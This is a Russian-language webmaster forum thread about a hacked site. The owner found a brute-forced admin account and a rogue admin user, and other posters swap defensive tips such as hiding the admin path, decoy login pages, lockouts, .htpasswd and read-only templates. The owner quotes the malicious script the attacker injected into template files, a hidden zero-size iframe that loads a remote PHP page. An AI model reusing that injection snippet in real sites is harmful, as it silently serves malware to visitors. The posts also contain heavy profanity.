копался случайно на своём сайте в разделе пользователей, и случайно обнаружил, что один из пользователей зарегил себе логин user и каким то образом оказался с правами администратора. Как такое может быть? и как он это сделал? получается есть какой-то баг, ведь под админом можно сделать всё что угодно .... https://yadi.sk/i/VjFrtigQ3ADZzm и как себя обезопасить? более того начал проверять ftp клиентом, какие файлы были редактированы, оказалось чел залез в fullstory.tpl и navigation.tpl и вставил следующий код <script>document.write('<iframe src="http://avnt.ru/swf.php" width="0" height="0" frameborder="0"></iframe>');</script>
начал разбираться дальше, чел видимо подобрал пароль к логину admin, затем создал пользователя user, зачем-то и изменил 3 файла. https://yadi.sk/i/odGrvlAM3ADiiz потом начал смотреть Список действий в админпанели , логин admin я давно не пользуюсь, а по нему кто то периодически логинился.
Я конечно извиняюсь и может я не прав но объясните мне пожалуйста ............. какого хуя вы вообще открываете регу ??? По моему уже отошли времена когда вебмастера выебывались своими базами зареганных людей друг перед другом, смысл от них? На всех сайтах закрыта рега и считаю что она по большому счету нахуй не кому не нужна, сейчас пользователи скотины ленивые пошли и им пальцем то лень пошевелить не то что регаться. Но даже если и зарегался юзер какая выгода и польза с этого? P.S. - я конечно не беру в расчет помешанных всяких людей на коллекционировании почтовых ящиков с дальнейшей рассылкой по ним с целью впарить какую нибудь хуйню
@BROKER, открыл регу для постоянников, вырубил им рекламу, подумал что так будет лучше. Но они то брутили логины админа, поэтому открыта или закрыта рега уже не имеет значения
Наверное открою тайну но для всяких таких уебанов нужно делать левую админку нерабочую и пусть ебутся брутят когда как рабочую нужно по другому пути прописывать, нерабочая мало того что хуй кого авторизует даже если и правильные данные введешь так еще и блочить будет как и рабочая админка.
проверил остальные сайты, каждые 5-10 минут, идёт попытка взлома-подбора логин-пароля. это какой-то пизнец. людям нех заняться, лучше бы бабки зарабатывали (((
1. Меняй путь админки. 2. Включи авторизацию только через соцсети (ВК/ФБ... есть почти у всех). 3. Измени 20 минут блока на 2000 минут блокировки при неверно введенных 2-3 попытках: 4. Удали всех админов кроме себя. 5. Поставь фейк авторизации от вордпресса по адресу admin.php
ночью пытались снова проникнуть, но меры принял странно что один ip с которого лезут, хостинги разные были у сайтов, переехал буквально как пару дней на общий. судя по регам, до переезда уже заходили в админку. совпадение ли ...
@Driple, а если так ? - 1. вход в админку закрыть .htpasswd 2. все файлы шаблона поставить права 444 у меня так и гемороя пока не было тьфу тьфу я думаю один .htpasswd спасет от всей ебаты, тока в нем пароль ставь не 123456 )